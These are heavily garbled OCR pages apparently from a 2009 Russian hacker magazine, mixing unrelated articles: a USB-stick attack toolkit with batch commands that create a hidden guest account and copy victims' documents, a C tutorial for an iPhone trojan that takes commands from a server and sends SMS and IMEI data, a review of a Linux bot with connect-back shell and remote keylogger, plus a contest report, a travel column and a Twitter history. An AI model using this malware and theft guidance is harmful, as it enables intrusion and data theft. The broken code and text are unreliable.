- дать ли Wiпdо,,,s NT\CllrrentVers iоп\Wiпlоgоп\SресiаlАССОllлts\
искусственном.}' интелпе.к'I'У доступ к структуре ПdПОК? UserList» /v гость /t reg_dword /д О /Е - скроем появив
(0\1 )
шуюся учетку с ГЛdЗ долой от юзера
set recent_folder_for_analyze=%homedrive%%homepath%\
Recent\
net user гость 1234 - приправим паролем ло вкусу
менты вообще?
ОБ УДОБСТВАХ НЕ ЗАБЫВАЕМ
set no_copy_all_documents=O - вообще rтpопускаТh копи
Ну, хорошо, МЫ в какой-то степени удовлетворили наши заllрОСЫ по
рование каких-либо документов?
взлому, НО помимо всего прочего, моя система обладает массой прият
set not_attacking=O - не а'rаКОБат,,?
ных феliечек и фишек, таких, как автоматизированный вход в аську. На
set no_use_radmin=O - мне нельзя устанавливать раД~fИ1-f
диске ты слегкостью должен найти файл «pqp bat".
тронна в целевую систему?
Именно он управл~етвводом пароля ЭтотскриП1" 11росматриваетсвое
~ » Е:3ЛОМ
, Стэндзрт uз
• 90ttтаНО&Л8ние даННI
fp}ll1n't ~USВ Flasl1 DfNe Кlщ,tstоn»)
неисправ:ных носитеП81
8: поаЙС-l1ис:те
в' кэтэпоге · В ОГ\\1с8нYl" не УlI:аэзн~,
r.педуlOШИЙ тоеар скорость рвоoтыlБвB F'
прe..qъщущиЙ ТОtlзр Drlve, на какой скорос-п
работает?
'
АРJIIКУЛ: ?t-l450-1 НllПllЧllе H.J. скn.ще: В Д(1ННЫЙ 1,IOI,teHT Q1cyrCIByer. ПосrynлеНllЯ в ЛI'ОДt)ЖУ H~ t)".t!11Д.)~I~~R.
r::--------------------~---·--------I
~~~ыe_. ..1.
Проиээодитеnь Кiпgs!oп
US8 брелок с по.дцеРЖIОЙ технологии U3 (You free) ПОЭ90ПЯiOЩИИ эапускаtъ с Yt1PОКС1ВЗ проrрэммы Форм..-ra uз
Опнсанне
х'р.'ЗН:=t~е 91;8 денные H2Il1ash приводе и свободно переНQСИJ.ilые с однот ПКна дРуrоЙ. ...
Обьем Flаsh-нsкопнтanя
1ГО
цсета иепoJlьэовэнныe в
Серебрнсты~.черный
оформлении
тело и последовательно осуществляет клавиатурный ввод односимволь п ропи сать та м нужн ые идентифи каторы. 80Т список уже поддержи
ных комментариев в тексте про граммы. Если раскидать по этому файлу ваем ых:
БАSЕ
rеПl r здоровье,
тещ s
ОБСУДИМ ИТОГИ
- то на выходе мы получим пароль "V13Зkgгs». В итоге, пасс хранится МЫ получили, своего рода платформу, которая будет отлично работать
в нестанда ртном виде и нетребует при вводе нашего участия. не только на Т80ей машине, но и где-тотам, в чужой квартире, похищая
Следующая приятная фишка. если на флешке окажется места нужные тебе данные, И неважно, кто ты, мой читатель,утебя всегда
мен ьше эаранее оп ределенного объема. то автоматически от найдyrся вопросы и задачи, с которыми могла бы справитьсямоя система.
кроется утилита для удобного рассмотрения содержимого диска Допустим,ты студент-раздолбай,тогда флешка поможеттебе достать не
«sсаппег ехе», Ты меломан, как и я?Тогда тебя порадует встроенная только курсовые yTBoero препода. но и чертежи и прочую хрень, которая
поддержка плейлистов от Windows Med'la Player и воэможностьих поставляется в комплекте с курсачом, Если ты уже поимел всю сеть вуза
пересоэдания специальнымскрнптом или вовсе автоматически.Вся и помогаешь COTPYAHI~KaM через RаdmlП раскладывать пасьянс, то
музыка для этого заботливоукладывается в папочку MUZON Если у можешь пойти прогуляться до ближайшего салона сотовой связи. Есть
тебя 8ключен идентификатор типа «% BASE"/o~=8ASE", то система шанс заполучить в свои мохнатые руки их платежных клиентов - 8Ы
автоматически скопируеттебе на рабочий стол в отдельную папочку году оценивай сам, Если тебе и этого мало, то хочу отметить целый ряд
все награбленное добро с флешки 51 в свое время успешно ее ис ситуаций, когда. не дай Бог, сотрудник Сбербанка согласится принять
пользовал для решения повседневных задач системного админист с твоей флешки отсканированный тобой чек.
ратора, вроде полностью автоматизированной установки и настойки, Более того, сейчас все на каждом углу в ужасе кричат от эпидемии вируса
например. антивирусов на компьютерах юзе ров Сопfiсkег, а чем ты хуже? Неужели, имея в своем распоряжении такой мощ
Чуть не забыл I Чтобы собственная флешка не ополчилась на тебя, ный инструмент, ты не 8 состоянии нап исать свой тренировочный ботнет?
неоБХОДИI~О залезть по адресу «Пуск ~ Настройка ~ Панель Одним словом - срочно беги искать флеш-диск U3шного типа. Впрочем,
управления ~ Система ~ Допоnнительно ~ Переменные среды» и если немного позаниматься мазохизмом, сойдет любая флешка.::Х::
Х.АКЕР 06 112М О?
~ 06з
>> В;;:ЛОIY1
~////л
Х DOZNP
/ HTTP,1I0XOD.RU I
каНЬВЯБлаКАХ
П!И1ШЕМ ТРОЯН длЯ' APPLE IPHONE
• ФОРМАТ _ 5. Пятая и шестая части - apryMeHTbI Первые три параметра - управляющая часть,
УПРАВЛЯЮЩЕИ КОМАНДЫ для отправки конанды , например: инструкция типа «что сдепать». Вторые три
Первое, с чего надо начать написаниетрояна • %791.02020202% нонер телефона в неж параметра - OTBeTHa~ часть, инструкция типа
разработка формата команды. которую сервер дунарсдном формате «куда скинуть результат выполнения». Если
будет передавать клиентам [заражен ны м тел ефо • %192.168.1.1 OO%/master-server /res. с этим все понятно, то нечего тянуть резину,
ПримерЬ! команд:
whoarni. ping 'NW''''.ru) «ping www.ru» и выслать результат вы trojan. с' Основной файл с main () функ
4. LfетвеРТБЯ час'1'Ь - ТИП отправки использовать команды шелла. поэтому оставил cmd-parser.c
метра GET l51 I grep (х! и np.l. Таким обраэом, разделите СОВ, ВОЗ.8ращениерезультата
• %sm% отправка «ВНУТРИ» SМS-сосбще лем стал про цент - %. Что касается общей кон ht.tp-c1ient. с
ния цепции команды. то здесь все тоже очевидно Ilt t.p-cl j.Gпt.. h
· / sms: Работа с АТ-коиандаии. OTlГpaB *( (struct in_addr *)he->h_addr); дошли. Как говорится, сначала напиши, потом
parsed[ij = (Char*)
ЗаБирать команды с сервера наш троян будет МAXDATASIZE-1, О)); (strstx-(resp, "emd: ") 1=NULL)
по НТТР. Поэтому надо написаТь простенький if (bytes < 1) UCНAR eJl1d[1024];
клиенТНа сокетах. Готовые вещи в нашем случае strnepy(emd,&resp[172] ,
бестолковы, а форматhttр-запроса, думаю, ты ехН(l); (str1en(resp)-170) );
помнишь наизусть. Если не помнишь - ничего char * реЬ = strtok(cmd., "%");
страшного, напомню. Использовать ~Ш будем else i f (bytes<I',AXDATASIZE) i = О;
ehar* msg[2048J;
твоих целей -увеличишьбез проблем Только не sizeoL{COММAND.p2));
еме На всякий случа Й. повторю основные моменты, М ы используем аргумента АТ +CMSS. Утакого подхода есть небольшой нюанс - троян пре
резервное системноеустроЙство/dеv/ttу,dеЬug. через которое посыла красно работает, но сам телефон еме отправить после такого уже не может,
ются АТ-команды Основное устройство /dev/tty заблокирова но родным и Приходиться переэагружаться, В общем, этотбагя оставил специально.
демона м и телефона и использовать его не получится, М ы инициализируем чтобы тебе тоже было чем заняться J
соединение на скорости 115200 бод вот так' Помимо отправки СМС, допишем еще две функции, чтобы получать IMEI
телефона и ссю Это уникальные номера, их можно использоватьдля
exit(l); AT(fd) ;
ioccl(fd, TIOCEXCL);
char* res = ReadResp (fd)
tcgecattr(ld, &terrn);
cfrnakeraw(&term) ;
char* getIMEI{) (
c[setspeed(&term, speed);
inc: fd;
term.c_iflag = О;
AT(fd) ;
term.c_cc[\IМIN] = О; Сl0sеСопп(fd) ;
rеtЦПl Ео;
i.i ('Nrite(ld, :')uf, size) == -1} жен ному надо зарегистрироваться,С точки зрения трояна - это просто
еще один http-заГ1РОс. В качестве пара метра передает IMEI телефона и
fprinl:.f (stderr, "SendCmd error. %Б\П", trerror !err!lo) ) ; проверочный код, Код - это специальная функция. вычисленная от IMEI, В
exit(l); прошлой статье я приводил ее исходник на РНР на стороне сервера, А вот
} реализация на С:
) )
int getVKey (char* iшеi)
Для отправки СМС используется такая последовательность команд: if (strlen(imei) !=15) return -1;
int 'fkey = О;
s\..-itch (i) {
else j f (strstr (СОЮ~D. rt, "И5")! =NULl,)
саве О: 1 = 3; т = 101; break;
if (5t.rJ.еn(СОИМАND.гl»N!,LLи,
с ве 1: 1. = 7; m = 107; bJ.:eak;
str1en(CO~дND.r2»O) (
са:;," 2: 1. " 8; т = 3; break;
С]1ат *LlrJ.J:es[1024J;
cas," 3; 1 = 11; гt1 = 9; break;
sprintf(ur1res, "%В%5", СОЮ~D.г2,rеs);
саве 4; 1 = 13; lil = 71; break;
sendHt.tpReql,est (СОММ)ШD. [-1, urlres) ; ~ dvd
fr-ee(urlres) ; • Рабочую версию ис
тетеру (k, &imei [1], 1);
XOAHvi1(OB ты ~а~lДешь
с = atoi (k) ;
на диске.
v'keY+=C*ffii
• Новую версию
intl'egzombie(char-* imej) (
system(COt~~O.p1) ;
char-* regur-1.[1024];
sprintf(regur1,"/master-server/reg.
return О;
sепdSМS(СО~ЛD.р1,gеtIМЕI())
;
}
}
}
.1.1 !'IOMep по УМОl1чг.:Н-iИJC J использовался П1.JИ Ну что, все оченьпросто и открыто. Самый главный хаквзтомтро
/I записи видео-ролика дr1Я Х яне - написанная правильными ребятами утилита ldid. Она поз
sendSMS (" 89100000000" ,COMHA..1I1D.p2) ; 80ляетподписать скомпилен I~ЫЙ бинарник, чтобы он запускался
} нателефоне Процецура эта уникальна для каждого аппарата. Тут ~ warni'ng
eise ( возникает необходимость копироватьэ1)'УТИЛИ1)' на зараженный 8НИ'1ание! Инфор
sendSMS(CO~\NO p1,co~ft~D.p2); телефон, если она не была установлена самим владельцем вмес мация представлена
} / НИRI Ниавтор,
i f (stг1.еп(СОЮ1AND.р1.) > О)
Все когда-то кончается. Вкусное пиво иссякает, интересные деЙСТВИR ответствен
сЬат *тев[1024];
идеи безнадежно устаревают, мечты материализуЮТСR или ности не Hecyтl
sendSMS (СОММАND.г1,тев) ;
этого никуда. Надеюсь, тебе была полезна эта и прошлыеста
}
тьи цикла Как всегда, на все Bonpocbl отеечаю в блоге - b.ШdL
}
охоd.ГU Х
ХАКЕР 06 1126/ 09
1I1 I
ПРОГ АММЫ для ХАКЕР._О_В_ _
Ij~~~~~~ Не знаю, какой из браузеровты юзаешь, но я в кта «Disable - Search frorn file» ботнет . Кхм, О чем это я 7 Какты догадался, под
повседнев,IOЙработе привык доверять Flrefox. 2. Зайди на WvM .hashcracking, info и эагадоч'lЫМ определением «система удаленного
Одна иэ причин - огромное количество раз- прими сертификат безопаснос'!'и администрирования» скрывается масса полез
It~§';mШI нообразных пЛагинов на все случаи жизни.l. 3. Еыбери файлик с хэшаМТ-1 И ЖМИ 6а"Го.н ных софтин, помогающихуправлять множеством
Именно поэтому хочу представить тебе незаме 4. Опени результат Е окне бра-узера своих [и не совсем своих, а порой и совсем не
нимый плагинХЬаГV.1.2 О oTV01 d'a, созданный своих! компов. Сейчас я хочу представить именно
для поиска МD5-хэшей, определения РR(ТИЦ Пора подводитьитоги функциональности. такую тулзу - «НуЬпd Remote Ad mlПlstratюп
сайтов и обладающий функцией ReverselP. Плагин позволяет· System» OTCSrSS. СофтпреД'lазначенисключи
Для начала инсталлируем дополнение к Firefox: тельно для использования на Llпuх-платформеи
Теперь при каждом запуске брауэера в правом • Отправлять на анализ сразу не
нижнем углу будет дополнительная менюшка, сколько ИD5-хзшей из файла (очень • Connect Back shell (not епсrурtеd)
--_._- попедля ввода названиядомена,по которо Короче говоря, в срочном порядке ставим пла • Connect Back Encrypted keylogger
мумы получим РR/ТИЦ, а также ReverselP r'lH и дружно благодаримV01 d'a за очередной - кеЙлоггер. Записывает нажатие
Вбиваем домен и жме~~ "Enter». Через пару релиз l клавиш, кодирует их алгоритмами
секунд перед нами - подробный отчет со всеми rot4 7&RC4 и в режиме реального вре
необходи м,ыми да н н ым и. При допол н ительном por~~t'1t1~;HYBRID REMOTE }1ени отсылает на удаленную машину .
клике'н-а';начке «+» рядом С IР-адресом серве ADMINISTRATION SYSTEM Обработка логов кейлоггера происхо
ра активируется функция ReverselP. Она позво _LINUX дит при ПОМОЩИ клиентской КОНСОЛИ
ляет просмотреть список сайтов, хостящихся на M3i!JlcSRSS • Encrypted Rernote Terminal Еп'.Ulаtоr
~~~~l сервере. Но это еще не все, ибо есть возмож В прошлых выпускахХ-Тулз Я неоднократно вы (Е. R. Т, Е) - аналог SSH, при помощи
ность получить данные сразу по нескольким кладывал различные системы удаленного адми которого бот устанавливает соедине
I!:'~~~~§ доменам. Для этого заходим в раздел опций нистрирования под Винду, В этот раз я порадую ние с удаленной l:-fашиноЙ. Все данные
плагина, на вкладке «General" снимаем галку С тебя продуктом под совершенно другую платфор КОДИРУI:JТСЯ (rot47&RC4), использует
пункта <cDisable - Search [гот file" и выбираем му - Линух, Да-да, и на Liп ux' е можно поднять ся клиентская консоль.
''''---.--t------------------.----
n1у
$homeserver = ''http://localhost/ и попробуем построитьцепочкупроксиков:
public/getcmd,php"; # ПОЛУ'~ение
ботО!~ команд 1. Заливаен рруоху ,php на два раз
команд http://site2.com/proxy/pproxy.php
все СЛОЖf1ее. Порой прокси может понадобить 2. Запyrскаем покальный скрипт со
в сорце консоли бота вносим изменения в ея в самый неподходящиймомент... так какже следующииипараметраии:
параметры: быть? Выход один - иметь под рукой собствен per1 ploca1.pl -рх http://sitel.com/
ный проксик. готовый В любую минУ1У обслужить proxy/pproxy,php реу1 pJ.ocal.pl -рх
ту $.server_host = "127. О, 0,1" ; тебя J Причем, проще всего будет поднять не http://site2.com/proxy/pproxy.php
гс хост. на котором находится 601' (не Воuпсегили 3ргоху, а Рргоху, о котором я тебе -срх http://localhost: 8008 -Ьр 8009
QбходИМО ДЛЯ Е. R. Т. Е) сейчас расскажу. Тулза представляетеобой РН Р З. Пускаем браузер аа порт 8009
ту $pa.ss = "1"; # RC4 пасс (неооходи проксик, СОСТОАЩИЙ из двух частей -удаленноЙ 4, Схема цепочки такова: localhost
ио дЛЯ E.R,T.E & Keylogger) Iрргоху php! и локальной (plocal.plJ. На локалхос· -> site1.com -> site2.com -> target
ту $MAXLEN = 1024; те заnускаеТСА перловаА часть, прослушиваю
OIIt"!IlI"obaI1.SoduS
Ц>еО' ~-.J
$раss='сfсd208495d5б5еfббе7dff9f98 СЯ порт 8008, через который и следу л"",",,, ~_Io.(_.lIItо~",_I-_--..J_~--J
ука:занного времени бот автоматически isset($_POST['host']) ) указаНf10ГО форума, что особеf1НО полезно при
удаляеТС~f, Р.спи не дал о себе знать поис(е сплойтов под различные форумные
if(isset($secret) && ($_
движки. На данный моменттулза поддержи
в админке ты можешь f1аблюдать следующие POST [ 'secret'] ! = $secret)) exi t;
ваетнеСКОЛЬКQ самых извеСТf1ых форумов,
ПОЛА: hеаdеr('Сопtепt-tуре: среди которых - IP8, phpBB, v8ulletin, МуВВ
appl~cation/octet-stream'); последних версий.
[E.R.T.I::.] - команда @set_tirne_1irnit(0); Из возможностейскриnта следует отметить:
[L. Роус] - Local Port - локаль $query ~ base64_decode (str_
ный порт. на который бот будет слать t·epJ.acel" ". "+". $_POST[ 'quet·y'])); • Определение типа форума (расrrозна
данные list ($hOSl, $port) = explode (' : '. вание IPB. phpBB. vBulletin. МуВВ)
[L.Host] - Loca1 Host - наш :еР-адрес Ьаsеб4_dесоdе(str_rерlасе(" "+" • Определение версии движка форума
[R. Port] - Remote P-ort - удаленный if(!$port)$por-t = ВО; • Определение ВО31'10ЖНЫХ уязвиностей
порт, который прослушивает бот $ip = gethostbynamel$host); движка Форуиа и поиск поцходящих для
в общем, поюзай самостоятельно. Только не $etTnO. $еп·str. 20)) • Определение ТиЦ и PR саЙта. нд. ко
действия ответственность несешь сам fwrite($fp. $query); • Наличие поддержки работы через
ПРОГРДМt'1Д; PPROXY {
ей/sосks5 с авториsацией
ХАКЕР 06 11261 09
>> сцен.:.
OFTHEBRA
ОТЧЕТ С ФИНАЛААСМ ICPC 2009
21 апреля 2009 года три сотни лучших молодых математиков и программистов
му программированию АСIV11СРС,
главным спонсором I<ОТОрОГО выступает IВМ.
«Для решения серьезных проблем нужны Любая проблема здесь, как бы она ни была Также намечалось интересное российско-ки
величайшие. уверенные в своих способнос подана, всегда уп ирается В соста вление тайское противостояние от Китая традицион
тях умы, способные предложить нестандарт математических моделей и решение мате но приехало немало сильных команд, готовых
ные решения. - считает доктор Билл Паучер матических задач. Решений «на пальцах" не бороться за самые высокие места
[Blll Poucheri, профессорУниверситета бывает даже если задачку и можно решить
Бзйлор [Baylor UПlvеГSllуJ и исполнительный тупым перебором. такое решение не пройдет Соревнования и итоги
директор чемпионата ICPC - Их можно по ограничениям на ресурсы - для каждого Непосредственно фи нальные соревнования
назвать атлетами ИН,lOваций Они выходят за задания существуют пороговые значен И51 по проходили В КТН - Королевском технологи
рамки ограничений и получаютудовольствие, используемой памяти и времени выполнения. ческом университете Стокгольма. И ровно в 9
делая эту работу». утра 21 апреля был дан старт соревнованиям
Что говорить. спортивное прОI-раммирование Участники В этом году участникам было предложено
- штука очень специфичная, стоящая особ в зтом году представлять Россию поехали 8 11 задач, наиболее простой из которых
няком от того, что большинство людей вообще команд ИТМО Iчемпионы прошлого годаl. оказалась задачка с индексом «А»: ее
привыкли понимать под программированием. Саратовский ГУ [чемпионы России этого решили очень быстро и для большинства
Задачи. которые ставятся на соревнованиях года], МГУ, Алтайский ГУ. Новосибирский ГУ. команд именно она была первой решенной
по спортивному программированию. несут СПБ ГУ, Уральский и Южно-Уральский ГУ. Так задаче~i.
1, в себе. главныt-:1-0.бразом. математические же среди участников были такие известные За 5 часов соревнований было решено 9 из
и алгоритмические вопросы СПОРТИ8ное вузы как М1Т. Стзнфорд, Оксфорд, Варшав 11 зада ч: зто см огл и сделать две команды
программирование предъявляет к участникам ский Университет, Университет Карнеги - ИТМО и Университет Цинхуа Победите
соревнований высочайшие требования в Меллона и Циньхуа Предматчевые расклады ля определили по затраченному времени:
области математической подготовки, команд были простые: команда ИТМО приехала показав результат в 1381 минут второй раз
ной работы и навыков быстрого и чистого отстаивать статус Чемпионов мира. а все подряд ЧемпионамVI мира стали ребята из
программи рования остальные приехали мешать им это сделать:J. ИТМО!
~ links
• jroc.bavlOГ.edlJ
официальный сайт
чемпионата. Тут ты
можешь поо~отреть
фото и видео-архив.
скачать задания с
предыдущих сорев
нований и получить
любую другую инфор
мацию о чемпионате.
• WWW.5пагkпеW5.ir1fо
- новости российс
КИХ и международ
ных чемпионаТО8 по
программ ированию.
• w\Nw.loQcoder·.com
- сайт "сольного»
соревнования для
програММИСТО8.
• WWW.орепсuр.ГU
открытый чемпионат
МГУ по программиро
ванию.
• gQQgle.coIТl!
cocJejam - чемпио
нат codeJдm. который
про водит google.
• асm.timus.ГU - сай,
УРГУ. посвящен
ный олимпиадам по
программированию.
Тут размещен
выдающийся архив
задач и проееряюшая
система.
€)
~ dvd
На нашемдискеты
найдешь задачи
подборку фотографий
с финала ДСМ ICPC
2009 в Сто кгол же.
ХАКЕР 06 /1261 09
ФИНАЛЬНЫЕ РЕЗУЛЬТАТЫ
ОПТИКИ IСАНКТ-ПЕТЕРБУРГ)
T51NGHUA UNIVER51TY 9
1800
САНКТ-ПЕТЕРБУРГСКИЙ ГУ 8
1176
САРАТОВСКИЙ ГУ 8
1305
UNIVER5IТY OF OXFORD 7
998
ZHEJIANG UNIVER51TY 7
1117
MA55ACHU5EH5 IN5TITUTE OF 17
1143
TECHNOLOGY
АЛТАЙСКИЙ ГУ 7
125"
UNIVER51TY OF WAR5AW 7
1"13
UNIVER51TY
О
о
1",
~
;:J
» о lJ
7
О
7777
[J О О
О
~ 1. :р q- Д сч.г+F ъ,
tf-Jll: (Ь ~eJ J1l::::P9::::J-l'-tJ1ltu
t:?~7~?rR,гR
о
г
u
о
о
о
о
о
о
о
о
о
о
о
о
о
о
о
о
о
о
о
о
о
[l
с::
о
о
о
l
о
t:I~ct:7~7~[~~?[~?~·I:'~~J~?
о (1 по [Jf] О о о I
П О О О О О r' о [J О
'~q~G~,~g}G[l~tp~
~7tJ(,е7~7гН"p,~~
о u о о о
о о о о
и прихода больше нет Затем - что его, с зеркал кой и китайским паспортом,
вступ ИТЕЛ ЬНОЕ [компания Епdеаvог Security. куда первона - Нет, у иеня есть кошка I - сказала
Сейчас мы откроем страшную тайну; что частью этой корпорацииl. - Прекрасно! - обрадовался грифон.
же, на самом деле, случилось, .. Вынуждены о ездите докладами по хакерским конферен -- ДаЕНО пора 'гебе рассказать нан о
нам пришлось усыпить Криса Ic помощью о ведет с различными издательствами пере Льюис Кзрролл. «Алиса в Стране чудес»
,~
экспериментальной медицины, чтобы выпла· • судится с посольством Южной Афри ки; ность повествовагlИЯ,ЭТИ строки пишутся из
~ титьдолг перед финской типографией (факен • егохвостсворачивается в ИВрИI. поскольку в далекой и загадочной Малайзии - страны
<
'~
кризис l ] Израиле у Криса тоже ки п ят мажорны е дела самобытной экзотики, роскошных песчаных
It's ajoke, амиго, не волнуЙся:l. В действитель пляжей и восточного колорита, Мысли скачут
.~
Какты понимаешь, все это отнимает невероя,'·
ности. Крис крутится по всему периметрутак. ное количество времени и сил, НО он планирует сайгаками по колдобинам, от избытка впе·
ЧТО ды М из ушей идет: вновь писать в:н:. и ВОТ тому подтверждение, чатлений ТОПОРЩИТС\1 шерсть, и хвост встает
('
~
~
• работаеl' независимым консультантом в
подразделении McAFee, сотрудники которого - у тебя есть свой конек?! -- спросил
Аыбом, потому как потрясающе красивых
~
~
"" ~ 074 ХАКЕР 06 11261 09
~
1
I
....
.... , / (:цен.:.
ЛЕНИВЫЕМАЛАЙЦЫ
Большой неОЖL1данностьюОl(азалсяДЛЯ меня
ужасаlОЩИЙхолод, вынуждающийтаскатьс собой
свщер, И ЭТО ПрL135 градусах по Цельсию! Ну, в А все почему? Преступлений ЧТОЛL1 меньше? мы, значит, в чулане у раджи, прямо на обо
TeHL135, а во всех остальных местах понатыканы Так ведь ни xBocTa l Карманы L1 барсетки чине свальной борозды, долБL1М этот«поtа
КОНДИЦL10неры, рабстаЮЩL1е на полную мощность. режут прямо в центральных аэропортах. Бай dгug» L1 rOBOpL1M за все дела KcтaTL1, "ндусы
Только L1 ищешь, где бы согреться И еще ищешь, керы срывают сумк" на ходу, Гопы сначала к малайкам абсолютно параллельны. Они на
чего бы эаТОЧL1ТЬ. Малайская еда вкусная, дешевая бьют по голове, а уже потом смотрят, что ы них насмотрелись, "м латинок подавай.
которых видели только по телевизору и о которых мирового масштаба L1 не живет В посто армии (в ИзраL1ле все деВУШКL1 служат) и со
товаРL1ЩИ. побывавшие в AMepL1Ke, рассказывают янном страхе, что сейчас ограбят, убьют, СПОРНIВНОЙ подготовкой У нее все в порядке
вся кие бай KL1, как эападные женщины готовы лечь изнасилуют и даже "мен" не спросят. Не, на Гуляешь с такой по ночному городу и чувству
под первого встречного, Малайцы слиш ком ле самом деле меня тут едва не изнасиловаЛL1, ешь себя в полной безопасности.
нивые, чтобы ухаживать, Адевушки тут .. TaKL1e же, И руку на грудь клали, и за хвост хватали, и Еврейки мыщьху настолько понраВИЛL1СЬ, что
каки везде. особенно еслиучесть, что малайцев В только когда она поняла, что ей с подругой он даже HI~ с кем не переспал И ка к это я так
Малайзии нетакуж и MHoro. TYPL1CTOB - куда боль ничего не обломится, натуральным обра отличился, не понимаю Хотя, скорее всего, это
ше. Китаянки, японки .. , ПРL1веТЛL1вые, открытые и 30М выстаВL1ла за дверь А дверь эта была связано с сильной усталостью Я же сюда не на
оБЩlЛельные. AMepL1KaHCKL1e девушки также легко в деревне. И такси там по~мать нереально. отдых приехал, а на работу. К вечеру настолько
идут на контакт. осооенно в местах вынужденного Общественный транспорт ходит по непонят выматываюсь, что сил хватаеттолько на то, чтобы
заключения, типа аэропортов и прочих домов ным траекториям. Благо, хоть ТWlп-Тоwегs посидеть с коллегаМL1в ресторане, после чего
терп и!"юсти Легкость, с которой он и переходят на (небоскребы «Башни Близнецы Петронас»1 вернуться В отел ь и завалиться на топ ча н. Нату
обсуждениеличных проблем, просто поражает, были видны, и мыщъх, как дурак, шел по ральный такой топчан. На который и девушку-то
но это вовсе незначит, что знакомство получит азимуту четыре часа, пока не добрался до пригласить стыдно. Аеще называется «хороший
продолжение, Знакомство ~ это одно, а ни к чему цивилизации И все время думал ну вот, отель», где на второй день половые стащили
не обязывающая беседа - совсемдругое. се~час ограбят, убьют, изнасилуют. Так ведь свое же собственное покрывало L1 пришлось
нет ' Не ограБИЛL1, не убили, не юнасило долго разбираться с менеджером, на хвоста они
ОГРАБЯТ, УБЬЮТ, вали. Малайзия в зтом плане интересная это сделали. У нас в отелях, конечно, тоже воруют,
ИЗНАСИЛУЮТ страна. За наРКОТL1КИ приговаривают к смер но воруют осмысленно и по понятиям
Вообще говоря, люди здесь удивительно дру тной казни, но все какбы в теме, L1 у всех есть Зато у них можно спокойно посидеть с де
желюбные, привыкли улыбаться и общаться. «very speclal stuff, поt а drug» И вот CL1AL1M вушко~ В очень дорогом ресторане за ее счет.
О 1]
о
о
\I :~
~e? о
о
:fp
f,~e~,
С.I о
О r.:
'~"' о ;J
Мыщъх сидел с тремя, причем две из них замужем Одна - змигрантка Атаки следую]' непрерывно,так что лучшего места для тестирования
из Америки, остальн ые - коренные израильтянки Все образованные систем обнаруженияи предотвращениявторжений, пожалуй, не найти,
и начитанные, умные до невозможности, И ВОТ сидим мы, Значит, В рес Не могу умол чать О том, ЧТО в октябре п рошлого года здесь про води
торане под открытым небом На улице уже зима, ночь Слегка прохлад лась конференция HITB [Hack In The Вох), посвященная различным
но, но еще не холодно, Мимо нас идут ЛЮДи, а мы пьем пиво [ну, это она аспекта,~ инфор,~ационнойбезопасности На ней я представил
пьет пиво, а мыщьх - вишневый сок) и обсуждаем OpenBSD, ламповые доклад о найденных мной недоработках в процессорах Iпtеl, которые
усилители HiFI-класса, критикуя беспроводные колонки и прочую позволяют использовать уязвимости как непосредственноСИДЯ за
потребительскую муть, Оказываеl'СЯ, у нее трое детей, она ученый и компом, так и удаленно, вне зависимости от операционной систе
большой меломан, Ассемблер - это так, невинное хобби мы, установленных обновлений и приложений, Но зто уже тема для
отдельной статьи ..
АТАКИ СЛЕДУЮТ
~ '1
НЕПРЕРЫВНО
P.s.
Что касается хакеров, то G Малайзии они тоже наличествуют, причем Frою: Kris Kaspersky
практически всеза,шкаются на сетевой безопасности,дизассембли То: andrushoek@rea1.xakep.ru
рованием здесь никто не занимается - на Н IEW смотрят с удивлением, Subj ее t: Re (16] : статьи в следующий номер
'\ конкретно, но в основном - в сторону взлома, а не воздвижения Тут Доброго времени суток!
деревне Есть куча ,~ecт с бесплатным \NI-Fi, что существенно упрощает Только что вернулся из Малайзии, Устал жутко Долетели на честном
сетевые атаки и обкатку новых технологий взлома и защиты ОТ нападе слове и одном крыле, Один сегмент крыла отсутствовал ;-( ахренеть,
ния, Никогда бы не поверил, если бы не видел это сВоими глазами, Х
.076
\
в ЦЕЛОМ, нужно признать, ничего ин ИЗОБРЕТАЕМКОЛЕСО LlveJournal был совсе'! молод - регистрация
новационного и ранее невиданного Twittec ПРИДУ'lализагадочнуюпомесь блага с 1М [iпstапt осущеСТ8лялась по пригла шениям, и Дорси
действительноне несет. Явлению "сетевого messenger) в 2006 годутри '10ЛОДЫХ IT -шника:Джек получил в системе номер 4,136. Нес'lОТРЯ нато,
дневника» CaMO'lY по себе никак не '1еньше Дорси (Jack Dorseyi, БиэСтоун [Biz Stonel и Эван что до нынешней популярности сервисубыло еще
15 лет, а если копнуть поглубже, так и вовсе Уильямс IEvan WilLlams] Но хотя создание сервиса далеко, Джеку ЖЖ понравился, а вскоре и вовсе
выясняется, что даже в до-httр-шный период, и является бесспорной заслугой всехтроих, ориги натолкнул молодого програ'lмиста на '1ысль.
еще во Bpe'leHa Usепеt, существовали нальная идея, всеже, принадлежала ДжекуДорси, Дорси понял, что ЖИВОЙЖУРI'lал можно сделать
подобия COBpe'leHHbIX блогов Специализи позтомуо не'! я расскажу чуть подробнее. еще более "живым». vi ДЛ51ЗТОГО нужно лишь
рованные сервисы для ведения онлайновых Дорси - программистЗ2лет от роду, увлечен добавить ВОЗ'lожность публиковать свой те кущий
дневн иков тоже появились далеко не вчера ный высокими технологиями практически с ста1УС в режиме реального вре'lени. Стоит сказать,
Например, столь популярная в рунете плат самогодетства. Еще в 140Н плотно заинтере чтотакая опция как «ста1УС» сейчас ПрИСУТС1'вует
форма для блоггинга - LlvеJоuгпаl!Живой совался логисти кой пересылок и переsозок, а практически во всех инстант мессенджерах, но
Журнал! недавно отметила свое десятилетие. точнее, программной стороной зто го нелегкого тогдаДорси подсмотрел ее BAIM [АОLlпstапt
Схожие факты и цифры можно привести дела Плоды его увлечения пожинают до сих Messengerl, которым активно пользовался')
на тему инстант мессенджеров. Не стоит пор - open sorce ПО, написанное ЮНЫ'l Джеком, Однакодо воплощения идеи вжизньдело не
забывать и о том, какое количество людей используют многие компании, предоставляю дошло 3адумка отправилась вдолгий ящик
по всему миру регулярно зависает в раз щие услуги такси. К 2000-му году, добившись - Джек был захвачен работой наддруги'lИ
личных социальных сетях [у нас зто, чаще определенных успехов, Дорси устал "работать проектами, ни один из которых так и не ПРИI'lес
всего, «Одноклассники» И «ВКонтакте», а за на дядю» и перебрался из родного Миссури в ощутимого результата. В итоге, о своей идее он
океаном - MySpase и Facebookl. Последние, Калифорн и ю. На но вом месте он орган изо вал снова вспомнил только в 20051'ОДУ, уже будучи
кстати, могут по хвастаться куда больши'l собственную небольшую компанию, оказываю работником подкастинговой компании Odeo Inc
,\ количествомфишек и наворотов, чем TWltter. щую курьерские услуги, услуги перевозки пас
\ Так откуда же, спрашивается, берется такой сажи ров, а та к же доступ к зкстрен ны '1 служба '1 ДО СТРАННОГО ПРОСТО
